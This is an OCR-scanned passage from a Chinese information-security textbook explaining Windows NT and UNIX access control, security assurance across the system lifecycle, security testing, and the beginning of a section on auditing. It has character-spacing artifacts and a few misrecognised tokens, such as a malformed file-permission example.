体 ， 主 体 对 客体 进行 解密 。 系 统 实现 了 一 种 名 为 or-access 的 方法 ， 人 允许 n 个 主体 访问 数据 。 
该 方法 使 用 n 个 不 同 密 钥 对 数据 的 n 个 副本 进行 加 密 ， 每 个 主体 拥有 一 个 密 钥 。 系 统 也 可 以 
实现 and-access 方法 ，n 个 主体 的 访问 请 求 同 时 发 生 才 不 拒绝 访问 。 使 用 n 个 密 钥 进行 迭代 
加 密 ， 每 个 主体 拥有 一 个 密 钥 。 


2.3.4 ”操作 系统 的 访问 控制 


上 一 节 我 们 对 访问 控制 技术 做 了 分 析 ， 这 一 节 将 对 当前 主流 操作 系统 的 访问 控制 进行 
介绍 。 


1. Windows NT 访问 控制 


Windows NT (New Technology) 是 Microsoft 在 1993 年 推出 的 面向 工作 站 、 网 络 服务 器 和 大 
型 计算 机 的 网 络 操作 系统 ， 也 可 做 PC 操作 系统 。 它 与 通信 服务 紧密 集成 ， 基 于 OS/2 NT 基础 
编制 。 它 有 两 个 版 本 : Windows NT Workstation 和 Windows NT Server。 这 两 个 版 本 的 NT 都 
有 相同 的 核心 支持 、 网 络 支持 和 安全 系统 。Windows NT Workstation 的 设计 目标 是 工作 站 操 
作 系 统 ， 适 用 于 交互 式 桌 面 环境 ，Windows NT Server 的 设计 目标 是 企业 级 的 网 络 操作 系统 ， 
提供 容易 管理 、 反 应 迅速 的 网 络 环境 。 两 者 在 系统 结构 上 完全 一 样 ， 只 是 为 适应 不 同 应 用 环 
境 在 运行 效率 上 做 相应 调整 。Windows NT Server 具有 更 多 的 高 级 功能 ， 可 把 Windows NT 
Workstation 看 作 它 的 子 集 。 我 们 现在 常见 的 WIN7 和 WIN8， 它 们 的 Windows NT 版 本 分 别 
是 NT6.1 和 NT6.2。 

为 了 实现 自身 的 安全 特性 ，Windows NT 把 所 有 的 资源 作为 系统 的 特殊 的 对 象 。 这 些 对 
象 包含 资源 本 身 ， 所 以 我 们 把 Windows NT 还 称 为 基于 对 象 的 操作 系统 。Windows 的 主要 对 
象 类 型 包括 : 文件 、 文 件 夹 、 打 印 机 、IO 设备 、 窗 口 、 线 程 、 进 程 以 及 内 存 等 。Windows NT 
的 安全 机 制 基于 以 下 原则 : 


用 对 象 表现 所 有 的 资源 

。 只 有 Windows NT 才能 直接 访问 这 些 对 象 。 

。 对象 能 够 包含 所 有 的 数据 和 方法 。 

e 对 象 的 访问 必须 通过 Windows NT 的 安全 子 系统 的 第 一 次 验证 。 

。 存在 几 种 单独 的 对 象 ， 每 一 个 对 象 的 类 型 决定 了 这 些 对 象 能 做 些 什么 。 

为 了 实现 上 述 安 全 原则 ，Windows NT 提供 两 种 形式 的 访问 控制 对象 许可 和 系统 范围 
用 户 权 利 。 对 象 许可 就 是 自主 访问 控制 。 用 户 权 利 ， 在 分 配给 组 的 时 候 ， 人 允许 一 种 基于 角色 
的 访问 控制 。Windows NT 的 内 核 包括 安全 访问 监视 器 (Security Access Monitor) 在 系统 的 一 个 
单一 模块 上 实现 了 这 些 访 问 仲裁 控制 .在 对 象 监视 器 中 所 有 资源 , 例如 文件 ( 仅 限 NTFS 格式 )、 
进程 、 打 印 机 、 注 册 表 或 者 通信 设备 等 ， 都 用 一 个 对 象 来 表示 。 在 一 个 对 象 上 执行 指定 操作 
的 许可 存放 在 访问 控制 列表 中 (ACL，Access Control Lists). ACL 提供 了 一 个 细 粒 度 的 访问 控 
制 。 它 们 允许 对 象 所 有 者 基于 独立 用 户 ， 或 者 它们 定义 的 用 户 组 以 及 管理 员 定义 的 组 指定 许 
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可 。 为 了 管理 上 的 方便 同时 提供 了 本 地 组 和 全 局 组 。 

Windows NT 提供 的 安全 功能 中 很 重要 的 一 点 就 是 责任 一 一 确保 任何 实体 的 动作 将 唯一 
用 该 实体 标识 。 每 次 当 我 们 创建 一 个 用 户 或 一 个 组 的 时 候 ， 系 统 会 分 配给 该 用 户 或 组 一 个 唯 
一 SID(Security Identifier, 安全 标识 符 )。 它 是 由 计算 机 名 、 当 前 时 间 、 当 前 用 户 态 线程 的 CPU 
耗费 时 间 的 总 和 三 个 参数 决定 以 保证 它 的 唯一 性 。 当 用 户 登 录 系 统 时 需要 进行 验证 ， 用 户 通 
过 验证 后 ， 登 录 进 程 会 给 用 户 一 个 访问 令 牌 ， 该 令 牌 相当 于 用 户 访问 系统 资源 的 票证 ， 当 | 
户 试图 访问 系统 资源 时 ， 将 访问 令 牌 提供 给 Windows NT ， 然 后 Windows NT 检查 用 户 试 
图 访问 对 象 上 的 访问 控制 列表 。 如 果 用 户 被 允许 访问 该 对 象 ， Windows NT 将 会 分 配给 用 户 
适当 的 访问 权限 。 

Windows NT 中 的 访问 控制 列表 分 为 两 种 : 自主 访问 控制 列表 ( Discretionary ACL)、 系 统 
访问 控制 列表 (System ACL)。 自 主 访问 控制 列表 包含 了 用 户 和 组 的 列表 ， 以 及 相应 的 权限 。 
而 系统 访问 控制 列表 是 为 审核 服务 的 ， 包 含 了 对 象 被 访问 的 时 间 。 这 两 种 访问 控制 列表 中 都 
包含 访问 控制 项 (Access Control Entries，ACE)， 它 包含 了 用 户 或 组 的 SD 以 及 对 象 的 权限 。 
访问 控制 项 有 两 种 :允许 访问 和 拒绝 访问 。 拒 绝 访问 的 级 别 高 于 允许 访问 。 

当 用 户 访问 系统 资源 时 ，Windows NT 系统 首先 检查 文件 的 ACL。 如 果 该 用 户 没 有 出 现 
在 ACL 中 ， 并 且 不 是 ACL 所 列 组 中 的 任 一 成 员 ， 则 访问 被 拒绝 。 和 否则， 如 果 任 一 ACL 条 
目 拒绝 用 户 的 访问 ， 系 统 就 拒绝 访问 (这 是 一 种 显 式 拒绝 )。 如 果 访 问 不 被 显 式 拒绝 ， 而 用 户 
又 在 ACL 中 出 现 ， 则 该 用 户 的 权限 集 就 是 所 有 指定 此 用 户 的 ACL 条 目 中 权限 集 的 并 集 。 

2. UNIX 访问 控制 


在 UNIX 系统 中 ， 为 每 个 用 户 分 配 一 个 用 户 ID(user ID，UID)， 以 整数 表示 。 用 户 可 以 
属于 “组 ”， 组 是 允许 人 们 在 合作 项 目 上 工作 的 虚拟 集合 。 每 个 组 都 有 自己 的 标识 符 ， 称 为 
组 ID(group ID，GID)。 用 户 可 以 属于 多 个 组 。 

当 UID 为 0 时 ， 表 示 为 系统 管理 员 (root 用 户 )。UID 为 0 的 系统 管理 员 拥有 对 整个 系统 
的 访问 和 控制 权限 。UNIX 系统 中 的 所 有 对 象 ， 包 括 文件 、 设 备 、 目 录 ， 都 被 分 配 一 个 UD 
和 GID。 除 了 所 有 者 标识 符 ， 每 个 对 象 都 有 与 它 关 联 的 访问 权限 ， 这 些 权限 指定 谁 有 权 读 、 
写 和 执行 这 个 对 象 (恰好 对 象 是 一 个 程序 )。 每 个 文件 有 三 组 “rwx” 这 样 的 访问 权限 ， 第 一 组 
表示 文件 的 拥有 者 ， 第 二 组 表示 同 组 用 户 ， 第 三 组 表示 系统 中 的 其 他 用 户 。UID 为 0 的 用 户 
可 以 对 任何 对 象 做 任意 操作 ， 不 受权 限 限制 。 我 们 看 下 面 的 例子 : 


-rwxr-xr-1l jim hp 4 月 9 日 17:50 test.txt 


由 上 述 信息 看 出 ，testtxt 文件 拥有 者 是 jim, jim 拥有 读 、 写 、 执 行 的 权限 ，jim 所 属 的 
用 户 组 是 hp， 组 成 员 拥 有 读 和 执行 的 权限 ， 其 他 用 户 只 拥有 读 的 权限 。 

通常 情况 下 ， 当 用 户 执 行 一 个 程序 时 , 执行 这 个 程序 的 用 户 的 UID 被 分 配给 执行 中 的 程 
序 和 它 所 有 的 子 进程 。 这 是 UNIX 访问 控制 的 基础 ， 对 象 总 是 被 运行 中 的 进程 访问 。 当 进程 
试图 访问 某 一 个 对 象 时 ， 操 作 系统 先 检查 被 分 配给 该 进程 的 有 效 UID 和 有 效 GID， 然 后 再 查 
看 它们 是 否 拥有 访问 权限 。 
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24 “安全 保障 


在 现实 世界 中 ， 没 有 一 个 系统 是 绝对 安全 的 ， 使 用 安全 保障 技术 可 使 系统 在 安全 性 、 可 
靠 性 和 健壮 性 方面 都 得 到 增强 。 本 节 将 具体 描述 安全 保障 的 相关 概念 、 基 本 思路 和 方法 。 


2.4.1 保障 模型 和 方法 


安全 保障 是 判断 信息 系统 可 信 度 的 基础 ， 安 全 保障 技术 用 来 检验 需求 的 正确 性 以 及 设 
计 、 实 现 和 维护 的 有 效 性 ， 能 显著 提高 系统 的 可 信 度 ， 及 早 发 现 错误 并 修正 错误 。 在 系统 的 
生命 周期 中 ， 从 建立 需求 到 系统 设计 ， 到 开发 ， 再 到 测试 和 维护 ， 每 个 过 程 都 应 该 采用 相应 
的 安全 保障 技术 。 好 的 生命 周期 模型 不 仅 可 以 提高 开发 软件 的 质量 ， 也 可 以 增强 其 安全 性 。 

1. 安全 保障 和 信任 


系统 的 安全 性 可 能 是 由 几 个 安全 机 制 , 或 者 是 一 组 定义 清晰 的 安全 需求 和 满足 安全 需求 
的 系统 实现 。 然 而 ， 仅 提供 安全 需求 或 者 一 些 安全 功能 并 不 能 使 一 个 系统 变 成 可 信任 系统 。 
要 证 明 一 个 系统 是 可 信 的 ， 需 要 使 用 一 些 方法 和 尺度 。 如 果 有 足够 的 可 信和 事实 证 明 一 个 系统 
满足 一 系列 安全 需求 ， 则 这 个 系统 是 可 信任 的 。 可 信任 系统 是 被 证 明 满足 指定 安全 需求 的 系 
统 ， 是 由 一 个 被 授权 评估 系统 安全 等 级 的 专家 组 织 来 进行 评估 的 。 将 一 个 系统 可 接受 的 信任 
程度 加 以 分 级 ， 凡 符合 某 些 安全 条 件 、 基 准 、 规 则 的 系统 即 可 归 类 为 某 种 安全 等 级 。 将 系统 
的 安全 性 能 由 高 到 低 划分 为 几 个 等 级 , 并 且 较 高 的 等 级 的 安全 范围 涵盖 较 低 等 级 的 安全 范围 ， 
也 就 是 说 ， 较 高 的 等 级 比较 低 的 等 级 有 更 严格 的 安全 保障 需求 。 
如 果 有 足够 可 信 的 事实 来 证 明 一 个 系统 满足 一 组 安全 需求 ， 则 这 个 系统 是 可 信任 的 。 信 
任 是 用 来 衡量 一 个 系统 的 可 信任 程度 的 ， 它 依赖 于 所 能 提供 的 可 信 事 实 。 对 信息 系统 的 信任 
应 该 建立 在 系统 的 设计 和 实现 满足 安全 需求 的 事实 基础 上 。 也 就 是 说 ， 可 信任 系统 的 基础 是 
安全 系统 。 
安全 保障 是 通过 使 用 多 种 多 样 的 安全 保障 技术 而 获得 的 ， 这 些 安全 保障 技术 提供 证 据 来 
证 明 系统 的 实现 和 运行 能 够 满足 安全 策略 中 定义 的 安全 需求 。 安 全 保障 技术 提供 证 据 的 方法 
可 分 为 非 形式 化 方法 、 半 形式 化 方法 和 形式 化 方法 : 
。 形式 化 方法 是 用 一 套 特 制 的 表意 符号 (其 意义 可 以 解释 的 ) 去 表示 概念 、 判 断 、 推 理 ， 
获得 它们 的 形式 结构 ， 从 而 把 对 概念 、 判 断 、 推 理 的 研究 ， 转 换 为 对 形式 符号 表达 
式 系统 的 研究 的 方法 。 凡 是 采用 严格 的 数学 工具 、 具 有 精确 数学 语义 的 方法 ， 都 可 
称 为 形式 化 方法 。 
。 非 形式 化 方法 使 用 自然 语言 来 描述 概念 、 判 断 、 推 理 。 此 方法 在 证 明 上 的 严密 性 最 低 。 
。 半 形 式 化 方法 也 使 用 自然 语言 来 描述 概念 、 判 断 、 推 理 ， 但 也 使 用 了 类 似 形式 化 方 
法 的 手段 来 增强 严密 性 的 证 明 。 
要 实现 安全 保障 需求 是 要 付出 许多 代价 的 。 在 任何 硬件 和 软件 系统 中 ， 导 致 安全 隐患 的 
安全 漏洞 是 很 常见 的 。 比 如 一 些 操作 系统 或 应 用 程序 被 应 用 到 不 适当 的 环境 中 ， 或 者 本 身 存 
在 严重 漏洞 ， 其 安全 性 就 会 下 降 。 
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信息 系统 安全 问题 有 以 下 几 种 来 源 : 

1) 需求 定义 的 遗漏 和 错误 ; 

2) 系统 设计 的 缺陷 

3) 硬件 缺陷 ， 如 接线 和 芯片 的 缺陷 ; 

4) 软件 执行 错误 ， 如 程序 错误 和 编译 错误 ; 

5) 系统 使 用 或 操作 中 的 错误 ， 以 及 不 经 意 的 失误 ; 

6) 故意 滥用 系统 ; 

7) 系统 硬件 、 通 信 部 件 或 其 他 设备 故障 ; 

8) 环境 影响 ， 包 括 自 然 因素 和 非 自然 因素 ; 

9) 系统 升级 、 维 护 错误 以 及 停止 运转 。 

安全 保障 的 目标 是 表明 系统 从 实现 到 运行 的 整个 生命 周期 中 是 满足 定义 的 安全 需求 的 。 
为 为 系统 开发 的 不 同 阶段 使 用 了 不 同 的 安全 保障 技术 ， 于 是 可 将 安全 保障 技术 分 为 策略 的 安 
全 保障 、 设 计 的 安全 保障 、 实 现 的 安全 保障 和 运行 的 安全 保障 。 

。 策略 的 安全 保障 需要 对 需求 进行 严格 分 析 ， 要 证 明 安 全 需求 的 完整 性 和 一 致 性 。 首 

先 要 标识 出 系统 的 安全 目标 ， 然 后 说 明 安 全 需求 能 够 应 对 系统 的 威胁 。 当 正确 的 安全 
需求 被 定义 好 ， 并 经 过 证 明和 核准 后 ， 系 统 的 设计 和 实现 工作 才 可 以 有 把 握 地 展开 。 

。 设计 的 安全 保障 指使 用 安全 工程 的 一 些 技术 方法 来 合理 进行 设计 ， 从 而 实现 安全 需 

求 。 同 时 还 包括 如 何 衡量 设计 满足 安全 需求 的 程度 。 

。 实现 的 安全 保障 指使 用 安全 工程 的 一 些 技术 方法 在 开发 和 系统 运行 阶段 正确 地 实现 

设计 ， 同 时 还 包括 如 何 衡量 实现 与 安全 需求 一 致 性 程度 。 

。 运行 的 安全 保障 是 通读 系统 的 使 用 说 明 ， 以 保证 系统 不 会 因为 偶然 的 设置 错误 而 处 

于 不 安全 状态 。 

可 见 ， 安 全 保障 技术 的 目标 就 是 为 了 可 以 解决 上 述 来 源 所 引发 的 安全 问题 ， 具 体 的 安全 
保障 技术 与 不 同 的 安全 问题 相对 应 : 

a) 设计 中 的 安全 保障 技术 应 用 到 需求 分 析 中 可 以 解决 第 1、2 和 6 条 引发 的 安全 问题 。 
如 果 安 全 需求 的 定义 有 误 ， 则 系统 安全 的 定义 肯定 也 是 错误 的 ， 那 么 系统 就 没有 安全 性 可 言 
了 。 正 确 分 析 系统 所 面临 的 安全 威胁 ， 在 设计 中 应 用 安全 保障 技术 可 以 发 现 设计 中 存在 的 安 
全 漏洞 ， 以 便 在 系统 实现 和 实施 之 前 纠正 错误 。 

b) 实现 中 的 安全 保障 技术 可 处 理 硬件 和 软件 实现 中 的 错误 (第 3、4 和 7 条 )、 系 统 维护 
和 升级 的 错误 (第 9 条 )、 系 统 滥用 (第 6 条 ) 和 环境 引发 的 问题 (第 8 条 )。 

c) 运行 的 安全 保障 技术 可 处 理 系统 使 用 过 程 中 的 错误 (第 5 条 ) 以 及 系统 滥用 的 问题 (第 
6 条 )。 

在 开发 阶段 ， 开 发 人 员 完 成 满足 安全 需求 的 系统 设计 ， 同 时 提供 安全 保障 的 证 据 以 证 明 
设计 的 确 是 满足 安全 需求 的 ， 然 后 就 是 保证 正确 地 实现 了 系统 的 设计 。 每 个 设计 和 实现 的 修 
正 过 程 之 后 就 是 一 个 安全 保障 证 明 的 过 程 ， 证 明 在 系统 实施 的 过 程 中 ， 需 求 在 连续 的 层次 中 
仍然 是 满足 的 。 整 个 过 程 是 欠 代 的 ， 当 安全 保障 过 程 中 出 现 问 题 时 ， 要 重新 检查 受到 影响 的 
步骤。 
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2. 建造 安全 可 信 的 系统 


为 某 种 应 用 而 考虑 开发 系统 时 ， 系 统 就 开始 了 其 生命 周期 。 首 先 简单 介绍 生命 周期 。 生 
命 周期 包括 了 一 系列 阶段 ， 每 个 阶段 包括 若干 工作 以 及 如 何 管理 这 些 工 作 。 系 统 设 计 和 编码 
就 是 工作 的 例子 ， 计 划 、 配 置 以 及 规范 的 选择 和 使 用 都 是 管理 工作 的 例子 。 所 有 这 些 工 作 都 
贯穿 于 系统 从 基本 的 构想 开始 到 项 目的 确定 、 系 统 开发 、 系 统 实施 、 系 统 维护 、 最 后 到 系统 
退役 的 整个 过 程 中。 通常 将 生命 周期 划分 为 若干 阶段 ， 有 些 阶段 与 上 一 个 阶段 是 相关 的 ， 而 
有 些 阶段 是 独立 的 。 自 主 访问 在 项 目 进行 的 过 程 中 ， 理 想 情 况 是 系统 从 生命 周期 的 一 个 状态 
不 断 转 移 到 下 一 个 状态 ， 但 在 实践 中 ， 经 常 有 和 迭代 的 情况 ， 比 如 当 后 面 阶段 中 发 现 了 前 面 阶 
段 存在 的 错误 或 者 遗漏 时 ， 就 需要 重新 进行 前 一 阶段 的 工作 。 

生命 周期 的 瀑布 模型 是 分 阶段 开发 的 模型 ， 在 开发 过 程 中 一 个 阶段 总 是 在 前 一 个 阶段 结 
束 以 后 才 开始 。 瀑 布 模型 包括 5 个 阶段 : 

1) 需求 定义 和 分 析 阶 段 。 这 个 阶段 将 高 层次 需求 更 详细 地 展开 , 同时 在 对 系统 进行 整体 
架构 设计 时 也 有 可 能 会 产生 新 的 具体 要 求 。 所 以 需求 定义 和 系统 整体 设计 未 完成 之 前 ， 两 者 
之 间 很 有 可 能 有 一 个 反复 迭代 的 过 程 。 需 求 可 分 为 功能 需求 和 非 功能 需求 。 功 能 需求 描述 系 
统 与 运行 环境 之 间 的 交互 。 非 功能 需求 是 对 系统 本 身 的 一 些 限制 ， 会 影响 设计 和 实现 。 需 求 
只 是 描述 “要 什么 ”而 不 是 “怎么 做 ”。 

2) 系统 和 软件 设计 阶段 。 进 行 系统 和 软件 设计 时 ,一 般 需 要 建立 外 部 功能 规范 和 内 部 功 
能 规范 。 外 部 功能 规范 描述 系统 的 外 部 特征 ， 如 输入 、 输 出 和 函数 的 约束 ， 内 部 功能 规范 描 
述 使 用 的 算法 、 数 据 结构 以 及 需要 的 内 部 函数 。 这 个 阶段 也 分 为 两 个 子 阶段 ， 系统 设计 和 程 
序 设计 。 系 统 设计 阶段 设计 整个 系统 ， 程 序 设计 阶段 设计 单个 程序 。 

3) 实现 和 单元 测试 阶段 。 系统 实现 是 在 前 面 系 统 设计 的 基础 之 上 实现 系统 程序 , 单元 测 
试 是 测试 程序 中 的 单元 是 否 满足 其 设计 规范 。 

4) 整合 和 系统 测试 阶段 。 系 统 整合 是 将 经 过 单元 测试 的 程序 组 装 成 完整 系统 的 过 程 。 系 
统 测 试 是 测试 整个 系统 满足 系统 需求 的 过 程 。 系 统 测试 也 是 一 个 迭代 过 程 ， 因 为 在 测试 中 经 
常会 发 现 问题 ， 然 后 要 进行 问题 的 修正 。 修 改 后 的 程序 进行 重新 组 装 ， 然 后 进行 系统 测试 。 

5) 系统 运行 和 维护 阶段 。 系 统 开发 完毕 后 ， 投 入 运行 。 系 统 维护 包括 修正 系统 在 运行 过 
程 中 发 现 的 错误 以 及 以 前 发 现 的 尚未 修正 的 错误 。 

在 实际 工程 项 目 中 ， 各 个 阶段 之 间 都 会 有 迭代 ， 因 为 后 一 个 阶段 经 常 可 以 发 现 前 一 个 阶 
段 中 存在 的 不 足 之 处 ， 需 要 重新 进行 前 一 个 阶段 的 工作 。 将 安全 保障 贯穿 于 系统 开发 的 整个 
生命 周期 中 ， 有 助 于 让 系统 实现 安全 需求 。 使 用 生命 周期 模型 并 不 能 保障 没有 错误 发 生 ， 但 
有 助 于 减少 错误 发 生 的 次 数 。 所 以 ， 为 系统 引入 安全 机 制 可 以 提高 系统 的 可 信 度 。 建 造 安全 
可 信 的 系统 ， 要 求 对 系统 设计 和 实现 过 程 中 的 每 一 步 都 适度 地 考虑 安全 保障 。 

3. 需求 定义 和 分 析 中 的 安全 保障 

安全 威胁 指 破坏 保密 性 、 完 整 性 或 者 造成 拒绝 服务 。 安 全 威胁 可 能 来 自 系 统 外 部 ， 也 可 


能 来 自 系统 内 部 ;可 能 来 自 授权 的 用 户 ， 也 有 可 能 来 自 非 授权 的 用 户 。 非 授权 用 户 可 以 伪装 
成 合法 的 用 户 ， 或 使 用 欺骗 手段 来 绕 开 安 全 机 制 。 安 全 威胁 还 可 能 来 自 人 为 错误 ， 或 者 是 不 
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可 预测 的 因素 。 

每 种 被 识别 出 来 的 安全 威胁 都 应 该 有 相应 的 应 对 手段 。 例 如 ， 设 定 一 个 安全 目标 ， 在 访 
问 任何 系统 资源 之 前 ， 所 有 用 户 都 必须 通过 用 户 标 识 和 身份 验证 ， 以 此 来 应 对 非法 使 用 系统 
的 威胁 。 有 些 情况 下 ， 安 全 目标 并 不 足以 应 对 所 有 安全 威胁 ， 这 时 需要 对 系统 的 运行 环境 做 
出 一 些 系统 假设 ， 比 如 增加 物理 保护 手段 等 ， 以 应 对 所 有 威胁 。 将 安全 威胁 映射 成 安全 目标 
和 系统 假设 ， 可 以 部 分 解决 系统 安全 需求 的 完整 性 问题 。 

安全 策略 就 是 一 系列 安全 需求 的 规范 说 明 ， 是 提供 安全 服务 的 一 套 准 则 ， 概 括 地 说 ， 一 
种 安全 策略 要 表明 当 系 统 在 进行 一 般 操 作 时 ， 什 么 是 安全 范围 允许 的 ， 什 么 是 不 允许 的 。 要 
准确 描述 需求 并 不 是 一 件 容易 的 事情 。 定 义 安 全 策略 和 安全 需求 的 方法 有 很 多 ， 一 种 可 行 的 
方法 就 是 从 现 有 安全 标准 中 精 选 出 一 些 可 行 的 需求 ， 另 一 种 方法 是 结合 现 有 的 安全 策略 和 对 
系统 安全 威胁 的 分 析 得 出 新 的 安全 策略 ， 第 三 种 方法 就 是 将 系统 映射 到 现 有 的 一 个 模型 上 。 
当 完 成 了 安全 策略 的 定义 和 规范 ， 就 必须 对 安全 策略 的 完整 性 和 一 致 性 进行 验证 。 

4. 系统 和 软件 设计 中 的 安全 保障 


设计 的 安全 保障 是 确认 系统 设计 满足 系统 安全 需求 的 过 程 。 设 计 保障 技术 需要 用 到 需求 
规范 和 系统 设计 规范 ， 是 一 个 检查 设计 是 否 满足 需求 的 过 程 。 

模块 化 和 分 层 的 设计 和 实现 方法 可 以 简化 系统 的 设计 和 实现 ， 从 而 使 系统 的 安全 分 析 更 
加 可 行 。 如 果 一 个 复杂 系统 有 很 好 的 模块 化 结构 ， 则 它 的 安全 分 析 也 将 更 可 行 。 分 层 方法 也 
简化 了 设计 ， 便 于 更 深入 地 理解 系统 。 另 外 ， 撰 写 设计 文档 和 规范 也 是 必要 的 ， 为 了 进行 安 
全 分 析 ， 设 计 文 档 中 至 少 应 该 包括 如 下 三 方面 的 内 容 : 安全 函数 、 外 部 接口 、 内 部 设计 。 规 
范 可 以 是 非 形 式 化 的 、 半 形式 化 的 或 者 是 形式 化 的 。 非 形式 化 的 规范 使 用 自然 语言 来 描述 ， 
半 形 式 化 方法 也 使 用 自然 语言 来 描述 规范 ， 同 时 使 用 一 个 整体 方法 强加 某 种 限制 。 形 式 化 方 
法 使 用 数学 语言 和 可 用 机 器 解释 的 语言 。 形 式 化 方法 的 语义 可 以 帮助 检查 出 规范 撰写 中 被 忽 
略 的 一 些 问题 。 

描述 规范 的 方法 决定 了 验证 规范 所 能 使 用 的 技术 。 非 形式 化 和 半 形 式 化 的 规范 描述 是 不 
能 用 形式 化 的 验证 方法 来 分 析 验 证 的 ， 因 为 这 些 规范 描述 使 用 的 语言 不 是 十 分 准确 。 不 过 还 
是 可 以 做 一 些 非 形式 化 的 验证 工作 。 对 于 非 形式 化 的 规范 描述 可 以 验证 其 是 否 满足 需求 ， 可 
以 验证 不 同 层次 的 规范 文档 是 否 一 致 。 常 用 的 非 形 式 化 验证 方法 有 需求 跟踪 、 非 形式 化 对 照 
和 非 形式 化 讨论 。 

需求 跟踪 是 标识 在 某 个 规范 中 的 不 同 部 分 满足 特定 安全 需求 的 过 程 。 非 形式 化 对 照 的 作 
用 是 展示 设计 规范 与 相 邻 层次 设计 规范 的 一 致 性 。 将 这 两 种 方法 结合 起 来 ， 可 以 更 大 程度 地 
保证 规范 文档 完整 地 、 一 致 地 满足 为 系统 定义 的 安全 需求 。 撰写 形式 化 的 设计 规范 开销 很 大 ， 
所 以 ， 撰 写 形式 化 设计 规范 的 开发 者 都 喜欢 使 用 一 些 自动 化 工具 来 完成 这 个 任务 ， 比 如 使 用 
基于 证 明 的 技术 或 者 模型 检验 器 。 对 形式 化 规范 进行 需求 跟踪 可 以 检查 规范 描述 是 否 满足 需 
求 。 在 使 用 形式 化 方法 之 前 先 做 非 形式 化 论证 有 利于 为 形式 化 的 证 明 提供 思路 。 

形式 化 证 明 技术 是 一 种 通用 技术 ， 通 常 基于 一 些 逻 辑 演算 ， 如 谓词 演算 。 这 些 技术 通常 
是 交互 式 的 ， 有 时 称 为 “证 明 检验 者 ” 这 是 因为 这 种 技术 只 是 验证 证 明 的 步骤 是 否 正确 。 形 
式 化 证 明 技术 被 用 于 证 明 一 个 规范 满足 某 个 性 质 ， 自 动 化 的 证 明 工具 可 以 自动 处 理 规范 和 相 
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应 的 性 质 。 

模型 检验 则 是 检验 特定 规范 是 否 满足 特定 模型 的 约束 。 模 型 检验 器 是 一 种 自动 化 工具 ， 
对 于 一 个 特定 的 安全 模型 ， 模 型 检验 器 用 于 检查 一 个 规范 是 否 满足 该 模型 的 约束 条 件 。 这 种 
检验 常 应 用 于 操作 系统 。 

5. 系统 实现 和 整合 中 的 安全 保障 


证 明 一 个 实现 是 否 满足 安全 需求 的 最 好 方法 就 是 测试 。 安 全 测试 的 方法 可 使 系统 实现 和 
合 过 程 能 有 更 多 的 安全 保障 。 

系统 是 模块 化 的 ， 在 可 能 的 情况 下 ， 尽 量 将 与 安全 无 关 的 功能 从 实现 安全 功能 的 模块 中 
去 掉 。 系 统 所 使 用 的 语言 也 会 对 安全 保障 产生 一 定 的 影响 。 有 些 语言 对 安全 的 实现 有 很 好 的 
支持 ， 使 用 这 样 的 语言 可 以 避免 一 些 常见 的 缺陷 ， 且 系统 更 可 靠 。 例 如 使 用 C 语言 实现 的 系 
统 , 可 靠 性 有 限 , 因为 C 语言 没有 适当 地 限制 指针 的 使 用 , 并 且 只 有 最 基本 的 错误 处 理 机 制 。 
而 支持 安全 实现 的 语言 能 够 检查 出 许多 实现 上 的 错误 ， 使 用 强 类 型 、 具 有 越界 检查 的 、 模 块 
化 的 、 具 有 分 段 和 分 段 保 护 的 、 具 有 垃圾 回收 和 错误 处 理 机 制 的 编程 语言 所 实现 的 系统 是 更 
可 信 的 ， 更 有 安全 保障 。 例 如 Java 就 是 以 实现 安全 代码 为 目标 的 程序 设计 语言 。 但 是 有 时 候 
使 用 高 级 语言 效率 比较 低 ， 此 时 编程 规范 可 以 弥补 语言 在 安全 方面 的 不 足 。 比 如 限制 低级 的 
编程 语言 只 能 在 不 适合 使 用 高 级 语言 的 地 方 使 用 。 

对 模块 化 的 系统 进行 整合 时 ， 良 好 的 模块 设计 和 模块 接口 的 设计 显得 尤为 重要 ， 使 用 一 
些 管理 方面 的 支持 工具 也 将 很 有 帮助 。 配 置 管理 是 在 系统 开发 和 使 用 期 间 对 任何 系统 硬件 、 
软件 、 固件、 文档 和 测试 文档 的 变动 所 实施 的 管理 。 一 般 由 若干 工具 或 者 手工 处 理 过 程 组 成 ， 
必须 执行 以 下 操作 : 版 本 控制 和 跟踪 ， 修 改 授 权 ， 合 并 程序 ， 实 现 系统 。 

有 了 两 种 典型 的 测试 技术 : 功能 测试 和 结构 化 测试 。 功 能 测试 ， 也 称 为 黑 盒 测 试 ， 用 于 测 
试 一 个 实体 满足 设计 规范 的 程度 。 系 统 测试 是 对 整合 后 的 系统 进行 的 功能 测试 。 结 构 化 测试 ， 
也 称 为 白 盒 测试 ， 其 测试 用 例 都 是 在 对 代码 的 分 析 的 基础 上 得 出 的 。 单 元 测试 是 程序 员 在 系 
统 整 合 之 前 对 代码 模块 进行 的 测试 ， 一 般 都 是 结构 化 测试 。 第 三 方 测试 ， 也 称 为 独立 测试 ， 
是 由 开发 团队 之 外 的 其 他 方 进行 的 测试 。 

安全 测试 是 解决 产品 安全 问题 的 测试 。 安 全 测试 包括 三 个 部 分 : 安全 功能 测试 ， 主 要 测 
试 相关 文档 中 描述 的 安全 功能 ; 安全 结构 测试 , 主要 对 实现 安全 功能 的 代码 进行 结构 化 测试 ; 
安全 需求 测试 ， 主 要 针对 用 户 需 求 中 的 安全 需求 部 分 进行 测试 。 一 般 而 言 ， 安 全 功能 测试 和 
安全 需求 测试 是 单元 测试 和 系统 测试 中 的 一 个 部 分 。 第 三 方 测试 可 能 会 包括 安全 功能 测试 或 
者 只 包括 安全 需求 测试 。 安 全 结构 测试 可 以 是 单元 测试 和 系统 测试 的 一 部 分 。 

6. 系统 运行 和 维护 中 的 安全 保障 


系统 实施 完成 后 进入 运行 阶段 ， 运 行 时 可 能 会 出 现 错误 ， 所 以 还 需要 对 系统 进行 维护 。 
热 修 复 只 是 即时 修改 错误 ， 然 后 将 修正 版 本 发 布 。 常 规 修 复 解 绝 不 是 十 分 严重 的 错误 ， 一 般 
是 累积 到 一 定 程度 才 发 行 出 去 。 
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2.4.2 审计 


审计 是 事后 认定 违反 安全 规则 行为 的 分 析 技 术 。 在 检测 违反 安全 规则 、 准 确 发 现 系统 发 
生 的 事件 以 及 对 事件 发 生 的 事后 分 析 方 面 ， 审 计 都 发 挥 着 巨大 作用 。 

计算 机 系统 审计 技术 的 发 展 ， 来 源 于 对 访问 的 跟踪 ， 这 些 访问 包括 对 保存 在 信息 系统 中 
的 敏感 及 重要 信息 的 访问 和 对 信息 系统 资源 的 访问 。 已 经 有 一 些 简单 工具 用 来 分 析 审计 记录 ， 
